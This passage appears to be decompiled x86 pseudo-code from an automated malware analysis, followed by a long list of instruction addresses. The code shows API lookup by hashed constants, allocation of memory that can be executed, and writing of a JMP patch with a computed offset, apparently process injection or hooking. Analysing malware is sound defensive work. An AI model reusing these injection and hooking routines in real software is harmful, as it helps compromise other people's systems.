				asm("movq [ecx+0x90], xmm0");
				E708CF8C4( &_v536, E708CF568( &_v536) + 0x10);
				E708CF558( &_v540, E708CF568( &_v540) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v548 = _v548 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v544 + 0x88)) = 0xc06fd820;
				asm("movq [ecx+0x90], xmm0");
				E708CF8C4( &_v544, E708CF568( &_v544) + 0x10);
				E708CF558( &_v548, E708CF568( &_v548) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v556 = _v556 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v552 + 0x88)) = 0xa54975b2;
				asm("movq [ecx+0x90], xmm0");
				E708CF8C4( &_v552, E708CF568( &_v552) + 0x10);
				E708CF558( &_v556, E708CF568( &_v556) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v564 = _v564 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v560 + 0x88)) = 0x271e028;
				asm("movq [ecx+0x90], xmm0");
				E708CF8C4( &_v560, E708CF568( &_v560) + 0x10);
				E708CF558( &_v564, E708CF568( &_v564) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v572 = _v572 + 1;
				asm("pxor xmm0, xmm0");
				( &_v568)[0x22] = 0xf279aa39;
				asm("movq [ecx+0x90], xmm0");
				E708CF8C4( &_v568, E708CF568( &_v568) + 0x10);
				E708CF558( &_v572, E708CF568( &_v572) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t953 =  *_t953 + 1;
				E708D413C(0xa5eabdf8, _t953);
				E708CF558( &_v576, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x4c], xmm0");
				E708CF558( &_v580, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x54], xmm0");
				E708CF558( &_v584, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x64], xmm0");
				E708CF558( &_v588, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x6c], xmm0");
				E708CF558( &_v592, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x74], xmm0");
				E708CF558( &_v596, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x7c], xmm0");
				_v584 = _t951;
				E708CADB8( &_v584,  &_v172, _t957,  &_v192);
				_t889 = _v176;
				_t931 = _v172;
				if((_v176 | _v172) != 0) {
					E708CB338( &_v308, _t951, __eflags, _t889, _t931);
					E708CF8DC( &_v516, __eflags);
					_v520 = 0;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v516 + 0x88)) = 0x5889e652;
					asm("movq [eax+0x8], xmm0");
					E708CF8C4( &_v516, E708CF568( &_v516) + 0x10);
					E708CF558( &_v520, E708CF568( &_v520) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v528 = _v528 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v524 + 0x88)) = 0x1eeb5e35;
					asm("movq [eax+0x8], xmm0");
					E708CF8C4( &_v524, E708CF568( &_v524) + 0x10);
					E708CF558( &_v528, E708CF568( &_v528) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v536 = _v536 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v532 + 0x88)) = 0xac5d5303;
					asm("movq [eax+0x8], xmm0");
					E708CF8C4( &_v532, E708CF568( &_v532) + 0x10);
					E708CF558( &_v536, E708CF568( &_v536) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v544 = _v544 + 1;
					_t954 = _t953 + 0xfffffff4;
					asm("movq xmm0, [esp+0x1bc]");
					asm("movq [esp], xmm0");
					_v548 =  &_v544;
					E708CBAB8( &_v340, __eflags);
					E708CF558( &_v552, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x5c], xmm0");
					E708CF558( &_v556, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x84], xmm0");
					_t935 = E708CF558( &_v560, 0x20);
					_v164 =  *((intOrPtr*)(_t935 + 8));
					_v144 =  *((intOrPtr*)(_t935 + 0xc));
					E708CF620( &_v396, 0);
					E708CF620( &_v416, 0);
					_push(0);
					_push( *0x708db7c4);
					E708D20A4(__eflags,  &_v100);
					E708CF75C( &_v416, __eflags);
					E708CE054( &_v100);
					E708CF8C4( &_v436, E708CF744( &_v420,  &_v100));
					_t437 = E708CF558( &_v424, 0);
					E708C7970(_t951, _t437, E708CF558( &_v444, 0), _v112);
					_t442 = E708CF568( &_v448);
					_v228 = _t442;
					_t101 = _t442 + 2; // 0x2
					_v188 = E708CB0A4( &_v584, 0x20000000, __eflags, _t101);
					_v236 = 0x20000000;
					_t444 = E708CB0A4( &_v588, 0x80000000, __eflags, 0x82);
					_v184 = _t444;
					_v204 = 0x80000000;
					__eflags = _t444 | _v204;
					if((_t444 | _v204) == 0) {
						L51:
						E708CF6F0( &_v380);
						E708CF6F0( &_v364);
						E708CF6F0( &_v332);
						goto L1;
					}
					__eflags = _v116 | _v164;
					if((_v116 | _v164) == 0) {
						goto L51;
					}
					E708D35D4( &_v292, 0, 0x80);
					_t955 = _t954 + 0xc;
					 *((intOrPtr*)( &_v316 + 0x78)) = _v20;
					E708CCDC0( &_v316, 0);
					_t459 =  &_v320;
					_t854 = _t459 + 0xe8;
					 *_t854 = _t641;
					 *((intOrPtr*)(_t854 - 4)) = _v20;
					_push(_t459);
					E708CB48C(_t641, _t459 - 0x20, _t854 - 4, _v20, _t951, _t951, _t854 - 4);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0x134], xmm1");
					_v236 = E708CF568(_v20);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esi+0x8], xmm1");
					_v220 = E708CF568(_t641);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [ebx-0x90], xmm1");
					E708D3C8C(_t951,  &_v60 - 0x80, __eflags, _v148, _v128, 7,  &_v60);
					_t133 =  &(( &_v564)[0x58]); // 0x160
					_t856 = _t133;
					 *_t856 = _v164;
					_t856[1] = ( &_v564)[0x69];
					E708CF8DC( &_v564, __eflags);
					_v568 = 0;
					_t746 =  &_v564;
					asm("pxor xmm0, xmm0");
					_t136 = _t746 + 0x88; // 0x88
					 *_t136 = 0x853cdd04;
					asm("movq [eax+0x8], xmm0");
					E708CF8C4( &_v564, E708CF568( &_v564) + 0x10);
					E708CF558( &_v568, E708CF568( &_v568) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v576 = _v576 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v572 + 0x88)) = 0xb162dc4e;
					asm("movq [eax+0x8], xmm0");
					E708CF8C4( &_v572, E708CF568( &_v572) + 0x10);
					E708CF558( &_v576, E708CF568( &_v576) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v584 = _v584 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v580 + 0x88)) = 0xc15ccc53;
					asm("movq [eax+0x8], xmm0");
					E708CF8C4( &_v580, E708CF568( &_v580) + 0x10);
					E708CF558( &_v584, E708CF568( &_v584) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v592 = _v592 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v588 + 0x88)) = 0x73f8f999;
					asm("movq [eax+0x8], xmm0");
					E708CF8C4( &_v588, E708CF568( &_v588) + 0x10);
					E708CF558( &_v592, E708CF568( &_v592) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v600 = _v600 + 1;
					_t762 =  &_v596;
					asm("pxor xmm0, xmm0");
					_t160 = _t762 + 0x88; // 0xa8
					 *_t160 = 0x4145240a;
					asm("movq [eax+0x8], xmm0");
					E708CF8C4( &_v596, E708CF568( &_v596) + 0x10);
					E708CF558( &_v600, E708CF568( &_v600) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v608 = _v608 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v604 + 0x88)) = 0xf06b4c6b;
					asm("movq [eax+0x8], xmm0");
					E708CF8C4( &_v604, E708CF568( &_v604) + 0x10);
					E708CF558( &_v608, E708CF568( &_v608) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v616 = _v616 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v612 + 0x88)) = 0x7d07f92f;
					asm("movq [eax+0x8], xmm0");
					E708CF8C4( &_v612, E708CF568( &_v612) + 0x10);
					E708CF558( &_v616, E708CF568( &_v616) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v624 = _v624 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v620 + 0x88)) = 0x2c2324e8;
					asm("movq [eax+0x8], xmm0");
					E708CF8C4( &_v620, E708CF568( &_v620) + 0x10);
					E708CF558( &_v624, E708CF568( &_v624) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t857 = _t955;
					 *_t857 =  *_t857 + 1;
					E708D413C(0xa5eabdf8, _t857);
					E708CF558( &_v628, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xf4], xmm0");
					E708CF558( &_v632, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xfc], xmm0");
					E708CF558( &_v636, 0x20);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x104], xmm0");
					E708CF558( &_v640, 0x30);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x10c], xmm0");
					E708CF558( &_v644, 0x40);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x114], xmm0");
					E708CF558( &_v648, 0x50);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x11c], xmm0");
					E708CF558( &_v652, 0x60);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x124], xmm0");
					E708CF558( &_v656, 0x70);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [ecx+0x118], xmm0");
					_t534 = E708CA5A4( &_v644, __eflags);
					_v524 = _t857;
					_t950 = _t534;
					__eflags = _t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff;
					if((_t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff) == 0) {
						L50:
						E708CB608(_t955 + 0xbc);
						E708CCDE0( &_v320, __eflags);
						goto L51;
					}
					_t858 =  &_v128;
					__eflags =  *_t858 | _t858[1];
					if(( *_t858 | _t858[1]) != 0) {
						L18:
						_v396 = 0;
						while(1) {
							__eflags = E708CAD68(0x80, _t950, _v400, _v112, _v132);
							if(__eflags != 0) {
								break;
							}
							_t605 = E708CA5A4( &_v520, __eflags);
							_v400 = 0x80;
							_t950 = _t605;
							__eflags = _t950 - 0xffffffffffffffff | 0x81;
							if((_t950 - 0xffffffffffffffff | 0x81) == 0) {
								goto L50;
							}
							_t878 =  &_v396;
							_t609 =  *_t878 + 1;
							 *_t878 = _t609;
							__eflags = _t609 - 0xa;
							if(_t609 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v396 = 0;
						while(1) {
							_push(0x80);
							_push(_v132);
							_push(_v112);
							_push(_v400);
							_push(_t950);
							_t860 =  &(( &_v520)[0x38]);
							__eflags = E708CA298( &_v520, _t860);
							if(__eflags != 0) {
								break;
							}
							_t600 = E708CA5A4( &_v540, __eflags);
							_v420 = _t860;
							_t950 = _t600;
							__eflags = _t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t877 =  &_v416;
							_t604 =  *_t877 + 1;
							 *_t877 = _t604;
							__eflags = _t604 - 0xa;
							if(_t604 != 0xa) {
								continue;
							}
							goto L50;
						}
						asm("cdq");
						asm("movd xmm1, eax");
						_v416 =  *((intOrPtr*)(_t955 + 0x1a4));
						_t647 =  &_v408;
						asm("movd xmm0, edx");
						asm("punpckldq xmm1, xmm0");
						 *_t647 = 0;
						 *((intOrPtr*)(_t647 - 4)) = _v188;
						asm("movq [edx], xmm1");
						_t544 = E708D3BA0(_t951, _t647 - 8, __eflags,  &(_t647[0x48]), 0x40, _t647);
						__eflags = _t544;
						if(_t544 != 0) {
							goto L50;
						}
						_v180 = 0;
						while(1) {
							_t863 = _v184;
							__eflags = E708CAD68(_t863, _t950, _v420,  *((intOrPtr*)(_t955 + 0x1a8)), _v188);
							if(__eflags != 0) {
								break;
							}
							_t595 = E708CA5A4( &_v540, __eflags);
							_v420 = _t863;
							_t950 = _t595;
							__eflags = _t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t876 =  &_v180;
							_t599 =  *_t876 + 1;
							 *_t876 = _t599;
							__eflags = _t599 - 0xa;
							if(_t599 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v184 = 0;
						while(1) {
							_t546 = E708CF558( &_v404, 0);
							_push(E708CF568( &_v408));
							_push(_v192);
							_push(_v144);
							_push(_v424);
							_push(_t950);
							_t864 = _t546;
							__eflags = E708CA298( &_v544, _t864);
							if(__eflags != 0) {
								break;
							}
							_t590 = E708CA5A4( &_v560, __eflags);
							_v440 = _t864;
							_t950 = _t590;
							__eflags = _t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t875 =  &_v204;
							_t594 =  *_t875 + 1;
							 *_t875 = _t594;
							__eflags = _t594 - 0xa;
							if(_t594 != 0xa) {
								continue;
							}
							goto L50;
						}
						_t550 = E708D3BA0(_t951,  &_v428 - 8, __eflags,  &_v428 + 0x120, _v428,  &_v428);
						__eflags = _t550;
						if(_t550 != 0) {
							goto L50;
						}
						E708CF620( &_v208, 0);
						_v100 = 0xe9;
						E708CF578( &_v100 - 0x70, __eflags,  &_v100, 1);
						_t650 =  &_v104;
						_t556 = _v172 -  *((intOrPtr*)(_t650 - 0x54)) + 0xfffffffb;
						__eflags = _t556;
						 *_t650 = _t556;
						E708CF578(_t650 - 0x74, __eflags, _t650, 4);
						_t907 =  &_v448;
						asm("movq xmm0, [0x708db798]");
						 *((intOrPtr*)(_t907 - 8)) = _v196;
						 *((intOrPtr*)(_t907 - 4)) =  *((intOrPtr*)(_t907 + 0x110));
						asm("movq [ebx], xmm0");
						E708D3BA0(_t951, _t907 + 0x120 - 0x128, __eflags, _t907 + 0x120, 0x40, _t907);
						_v192 = 0;
						while(1) {
							_t561 = E708CF558( &_v208, 0);
							_push(E708CF568( &_v212));
							_push(_v160);
							_push(_v180);
							_push(_v444);
							_push(_t950);
							_t867 = _t561;
							__eflags = E708CA298( &_v564, _t867);
							if(__eflags != 0) {
								break;
							}
							_t585 = E708CA5A4( &_v580, __eflags);
							_v460 = _t867;
							_t950 = _t585;
							__eflags = _t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff) == 0) {
								L49:
								E708CF6F0(_t955 + 0x174);
								goto L50;
							}
							_t874 =  &_v180;
							_t589 =  *_t874 + 1;
							 *_t874 = _t589;
							__eflags = _t589 - 0xa;
							if(_t589 != 0xa) {
								continue;
							}
							goto L49;
						}
						_v180 = 0;
						while(1) {
							_t955 = _t955 + 0xffffffd8;
							asm("pxor xmm0, xmm0");
							_v640 = _t950;
							_v636 = _v460;
							_t868 = _v196;
							_v632 = _t868;
							_v628 = _v176;
							_t806 =  &_v580;
							_v624 =  *((intOrPtr*)(_t806 + 0x198));
							_v620 =  *((intOrPtr*)(_t806 + 0x184));
							asm("movq [esp+0x18], xmm0");
							asm("movq [esp+0x20], xmm0");
							__eflags = E708CAD04(__eflags);
							if(__eflags != 0) {
								break;
							}
							_t579 = E708CA5A4( &_v616, __eflags);
							_v496 = _t868;
							_t950 = _t579;
							__eflags = _t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff) == 0) {
								goto L49;
							}
							_t872 =  &_v216;
							_t584 =  *_t872 + 1;
							 *_t872 = _t584;
							__eflags = _t584 - 0xa;
							if(__eflags != 0) {
								continue;
							}
							goto L49;
						}
						_push(0);
						_t869 = _v164;
						__eflags = _t869;
						_t870 =  !=  ? _t869 + 0xc : _t869;
						_push( !=  ? _t869 + 0xc : _t869);
						_t567 = E708CC3A8(_t869,  &_v416, 0x2710);
						E708CF6F0(_t955 + 0x184);
						E708CB608( &_v448);
						E708CCDE0( &_v416, __eflags);
						E708CF6F0( &_v480);
						E708CF6F0( &_v464);
						E708CF6F0( &_v432);
						E708CF6F0( &_v632);
						E708CB680( &_v592);
						E708CF6F0( &_v608);
						__eflags = _t567;
						return 0 | _t567 == 0x00000000;
					}
					_v388 = 0;
					do {
						E708CF620(_t955 + 0x188, 0);
						_push(0x23627913);
						_push(_t955 + 0x1cc);
						E708D1D00();
						E708CDD7C(_t955 + 0x1d0 - 8, _t955 + 0x1d0);
						_t879 = 0x7fffffff;
						E708CF578( &_v168, __eflags, _v92, E708CE94C(_v92, 0x7fffffff));
						E708CE054( &_v100);
						E708CD098( &_v108);
						_t836 =  &_v176;
						_t665 =  *((intOrPtr*)(_t836 + 0x28));
						 *((intOrPtr*)(_t836 - 0xf0)) = _v156;
						__eflags = E708CF568(_t836);
						if(__eflags <= 0) {
							L12:
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0xac]");
							asm("pxor xmm1, xmm1");
							_t837 =  &_v528;
							_v588 = _t950;
							_v584 =  *((intOrPtr*)(_t837 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v572 =  *((intOrPtr*)(_t837 + 0x198));
							_v568 =  *((intOrPtr*)(_t837 + 0x184));
							asm("movq [esp+0x18], xmm1");
							asm("movq [esp+0x20], xmm1");
							_t622 = E708CAD04(__eflags);
							__eflags = _t622;
							if(_t622 != 0) {
								E708D218C(0x3e8, _t879, _t950);
								E708CF6F0( &_v196);
								E708CADB8( &_v564,  &(( &_v172)[5]), __eflags,  &_v172);
								_t881 =  &_v176;
								__eflags =  *_t881 | _t881[1];
								if(__eflags != 0) {
									goto L18;
								}
								_t629 = E708CA5A4( &_v564, __eflags);
								_v444 = _t881;
								_t950 = _t629;
								__eflags = _t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff;
								if((_t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff) == 0) {
									goto L50;
								}
								goto L16;
							}
							L13:
							E708CF6F0( &_v196);
							goto L50;
						}
						_v404 = 0;
						while(1) {
							_t635 = E708CF558( &_v160, _v404);
							_t879 = _t635;
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0x94]");
							_t844 =  &_v532;
							asm("movq xmm1, [0x708db790]");
							_v592 = _t950;
							_v588 =  *((intOrPtr*)(_t844 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v576 = _t665;
							_v572 =  *((intOrPtr*)(_t844 + 0x80));
							_v568 =  *_t635 & 0x000000ff;
							_v564 = 0;
							asm("movq [esp+0x20], xmm1");
							_t638 = E708CAD04(__eflags);
							__eflags = _t638;
							if(_t638 == 0) {
								goto L13;
							}
							_t845 = 0x64;
							E708D218C(_t845, _t879, _t950);
							_t665 = _t665 + 1;
							asm("adc dword [ecx-0xf0], 0x0");
							 *((intOrPtr*)( &_v196 - 0xf4)) =  *((intOrPtr*)( &_v196 - 0xf4)) + 1;
							__eflags = E708CF568( &_v196) - _v440;
							if(__eflags > 0) {
								continue;
							}
							goto L12;
						}
						goto L13;
						L16:
						_t882 =  &_v432;
						_t633 =  *_t882 + 1;
						 *_t882 = _t633;
						__eflags = _t633 - 0xa;
					} while (_t633 != 0xa);
					goto L50;
				}
				L1:
				E708CF6F0( &_v532);
				E708CB680( &_v492);
				E708CF6F0( &_v508);
				return 0;
			}

0x708c9144
0x708c9148
0x708c914e
0x708c9150
0x708c9161
0x708c9164
0x708c916b
0x708c9174
0x708c917b
0x708c917f
0x708c9188
0x708c918f
0x708c9197
0x708c919c
0x708c91ab
0x708c91af
0x708c91c4
0x708c91da
0x708c91e8
0x708c91e9
0x708c91ea
0x708c91eb
0x708c91ec
0x708c91f3
0x708c91f7
0x708c9201
0x708c9216
0x708c922c
0x708c923a
0x708c923b
0x708c923c
0x708c923d
0x708c923e
0x708c9245
0x708c9249
0x708c9253
0x708c9268
0x708c927e
0x708c928c
0x708c928d
0x708c928e
0x708c928f
0x708c9290
0x708c9297
0x708c929b
0x708c92a5
0x708c92ba
0x708c92d0
0x708c92de
0x708c92df
0x708c92e0
0x708c92e1
0x708c92e2
0x708c92e9
0x708c92ed
0x708c92f7
0x708c930c
0x708c9322
0x708c9330
0x708c9331
0x708c9332
0x708c9333
0x708c9334
0x708c933b
0x708c933f
0x708c9349
0x708c935e
0x708c9374
0x708c9382
0x708c9383
0x708c9384
0x708c9385
0x708c938e
0x708c9390
0x708c939b
0x708c93a0
0x708c93a5
0x708c93b1
0x708c93b6
0x708c93bb
0x708c93c7
0x708c93cc
0x708c93d1
0x708c93dd
0x708c93e2
0x708c93e7
0x708c93f3
0x708c93f8
0x708c93fd
0x708c9409
0x708c940e
0x708c941a
0x708c9420
0x708c9430
0x708c9435
0x708c943e
0x708c9447
0x708c947e
0x708c9487
0x708c948c
0x708c9497
0x708c94a1
0x708c94a7
0x708c94b9
0x708c94cf
0x708c94dd
0x708c94de
0x708c94df
0x708c94e0
0x708c94e1
0x708c94e8
0x708c94f2
0x708c94f8
0x708c950a
0x708c9520
0x708c952e
0x708c952f
0x708c9530
0x708c9531
0x708c9532
0x708c9539
0x708c9543
0x708c9549
0x708c955b
0x708c9571
0x708c957f
0x708c9580
0x708c9581
0x708c9582
0x708c9583
0x708c9586
0x708c9589
0x708c959f
0x708c95a4
0x708c95a8
0x708c95b3
0x708c95b8
0x708c95bd
0x708c95c9
0x708c95ce
0x708c95d3
0x708c95e7
0x708c95ef
0x708c95f6
0x708c9606
0x708c9614
0x708c9620
0x708c9622
0x708c9629
0x708c963c
0x708c9643
0x708c965c
0x708c966a
0x708c9681
0x708c968f
0x708c9694
0x708c96a0
0x708c96ad
0x708c96b4
0x708c96c9
0x708c96ce
0x708c96d5
0x708c96dc
0x708c96e3
0x708ca1d7
0x708ca1de
0x708ca1ea
0x708ca1f6
0x00000000
0x708ca1f6
0x708c96f0
0x708c96f7
0x00000000
0x00000000
0x708c970c
0x708c9711
0x708c9722
0x708c9727
0x708c9733
0x708c973a
0x708c9740
0x708c9745
0x708c9748
0x708c974e
0x708c975c
0x708c975d
0x708c9761
0x708c9765
0x708c9769
0x708c977e
0x708c9789
0x708c978a
0x708c978e
0x708c9792
0x708c9796
0x708c97a0
0x708c97b6
0x708c97b7
0x708c97bb
0x708c97bf
0x708c97c3
0x708c97df
0x708c97f5
0x708c97f5
0x708c97fb
0x708c97fd
0x708c9800
0x708c9805
0x708c980c
0x708c9810
0x708c9814
0x708c981a
0x708c9820
0x708c9832
0x708c9848
0x708c9856
0x708c9857
0x708c9858
0x708c9859
0x708c985a
0x708c9861
0x708c986b
0x708c9871
0x708c9883
0x708c9899
0x708c98a7
0x708c98a8
0x708c98a9
0x708c98aa
0x708c98ab
0x708c98b2
0x708c98bc
0x708c98c2
0x708c98d4
0x708c98ea
0x708c98f8
0x708c98f9
0x708c98fa
0x708c98fb
0x708c98fc
0x708c9903
0x708c990d
0x708c9913
0x708c9925
0x708c993b
0x708c9949
0x708c994a
0x708c994b
0x708c994c
0x708c994d
0x708c9950
0x708c9954
0x708c9958
0x708c995e
0x708c9964
0x708c9976
0x708c998c
0x708c999a
0x708c999b
0x708c999c
0x708c999d
0x708c999e
0x708c99a5
0x708c99af
0x708c99b5
0x708c99c7
0x708c99dd
0x708c99eb
0x708c99ec
0x708c99ed
0x708c99ee
0x708c99ef
0x708c99f6
0x708c9a00
0x708c9a06
0x708c9a18
0x708c9a2e
0x708c9a3c
0x708c9a3d
0x708c9a3e
0x708c9a3f
0x708c9a40
0x708c9a47
0x708c9a51
0x708c9a57
0x708c9a69
0x708c9a7f
0x708c9a8d
0x708c9a8e
0x708c9a8f
0x708c9a90
0x708c9a96
0x708c9a99
0x708c9a9b
0x708c9aa6
0x708c9aab
0x708c9ab0
0x708c9abf
0x708c9ac4
0x708c9ac9
0x708c9ad8
0x708c9add
0x708c9ae2
0x708c9af1
0x708c9af6
0x708c9afb
0x708c9b0a
0x708c9b0f
0x708c9b14
0x708c9b23
0x708c9b28
0x708c9b2d
0x708c9b3c
0x708c9b41
0x708c9b46
0x708c9b55
0x708c9b5a
0x708c9b63
0x708c9b6b
0x708c9b70
0x708c9b77
0x708c9b84
0x708c9b86
0x708ca1bf
0x708ca1c6
0x708ca1d2
0x00000000
0x708ca1d2
0x708c9b8c
0x708c9b95
0x708c9b98
0x708c9db0
0x708c9db0
0x708c9dbb
0x708c9ddf
0x708c9de1
0x00000000
0x00000000
0x708c9de7
0x708c9dec
0x708c9df3
0x708c9e00
0x708c9e02
0x00000000
0x00000000
0x708c9e08
0x708c9e11
0x708c9e12
0x708c9e14
0x708c9e17
0x00000000
0x00000000
0x00000000
0x708c9e19
0x708c9e1e
0x708c9e29
0x708c9e29
0x708c9e2e
0x708c9e35
0x708c9e3c
0x708c9e43
0x708c9e48
0x708c9e53
0x708c9e55
0x00000000
0x00000000
0x708c9e5b
0x708c9e60
0x708c9e67
0x708c9e74
0x708c9e76
0x00000000
0x00000000
0x708c9e7c
0x708c9e85
0x708c9e86
0x708c9e88
0x708c9e8b
0x00000000
0x00000000
0x00000000
0x708c9e8d
0x708c9e9b
0x708c9ea3
0x708c9eae
0x708c9eb5
0x708c9ebc
0x708c9ec0
0x708c9ec4
0x708c9eca
0x708c9ed5
0x708c9ee0
0x708c9ee5
0x708c9ee7
0x00000000
0x00000000
0x708c9eed
0x708c9ef8
0x708c9f0e
0x708c9f1e
0x708c9f20
0x00000000
0x00000000
0x708c9f26
0x708c9f2b
0x708c9f32
0x708c9f3f
0x708c9f41
0x00000000
0x00000000
0x708c9f47
0x708c9f50
0x708c9f51
0x708c9f53
0x708c9f56
0x00000000
0x00000000
0x00000000
0x708c9f58
0x708c9f5d
0x708c9f68
0x708c9f71
0x708c9f84
0x708c9f85
0x708c9f8c
0x708c9f93
0x708c9f9a
0x708c9f9b
0x708c9fa6
0x708c9fa8
0x00000000
0x00000000
0x708c9fae
0x708c9fb3
0x708c9fba
0x708c9fc7
0x708c9fc9
0x00000000
0x00000000
0x708c9fcf
0x708c9fd8
0x708c9fd9
0x708c9fdb
0x708c9fde
0x00000000
0x00000000
0x00000000
0x708c9fe0
0x708ca000
0x708ca005
0x708ca007
0x00000000
0x00000000
0x708ca016
0x708ca022
0x708ca02d
0x708ca039
0x708ca043
0x708ca043
0x708ca046
0x708ca04e
0x708ca05a
0x708ca069
0x708ca071
0x708ca074
0x708ca07d
0x708ca08d
0x708ca092
0x708ca09d
0x708ca0a6
0x708ca0b9
0x708ca0ba
0x708ca0c1
0x708ca0c8
0x708ca0cf
0x708ca0d0
0x708ca0db
0x708ca0dd
0x00000000
0x00000000
0x708ca0e3
0x708ca0e8
0x708ca0ef
0x708ca0fa
0x708ca0fc
0x708ca1b3
0x708ca1ba
0x00000000
0x708ca1ba
0x708ca102
0x708ca10b
0x708ca10c
0x708ca10e
0x708ca111
0x00000000
0x00000000
0x00000000
0x708ca113
0x708ca118
0x708ca123
0x708ca123
0x708ca126
0x708ca12a
0x708ca134
0x708ca138
0x708ca13f
0x708ca14a
0x708ca14e
0x708ca158
0x708ca162
0x708ca166
0x708ca16c
0x708ca177
0x708ca179
0x00000000
0x00000000
0x708ca183
0x708ca188
0x708ca18f
0x708ca19a
0x708ca19c
0x00000000
0x00000000
0x708ca19e
0x708ca1a7
0x708ca1a8
0x708ca1aa
0x708ca1ad
0x00000000
0x00000000
0x00000000
0x708ca1ad
0x708ca200
0x708ca202
0x708ca209
0x708ca20e
0x708ca211
0x708ca21f
0x708ca230
0x708ca23c
0x708ca248
0x708ca254
0x708ca260
0x708ca26c
0x708ca275
0x708ca27e
0x708ca287
0x708ca28e
0x00000000
0x708ca290
0x708c9b9e
0x708c9ba9
0x708c9bb2
0x708c9bb7
0x708c9bc3
0x708c9bc4
0x708c9bd4
0x708c9be2
0x708c9bf5
0x708c9c01
0x708c9c0d
0x708c9c19
0x708c9c20
0x708c9c23
0x708c9c2e
0x708c9c30
0x708c9cdb
0x708c9cdb
0x708c9cde
0x708c9ce7
0x708c9ceb
0x708c9cef
0x708c9cf5
0x708c9cf9
0x708c9d05
0x708c9d0f
0x708c9d13
0x708c9d19
0x708c9d1f
0x708c9d24
0x708c9d26
0x708c9d3e
0x708c9d4a
0x708c9d5e
0x708c9d63
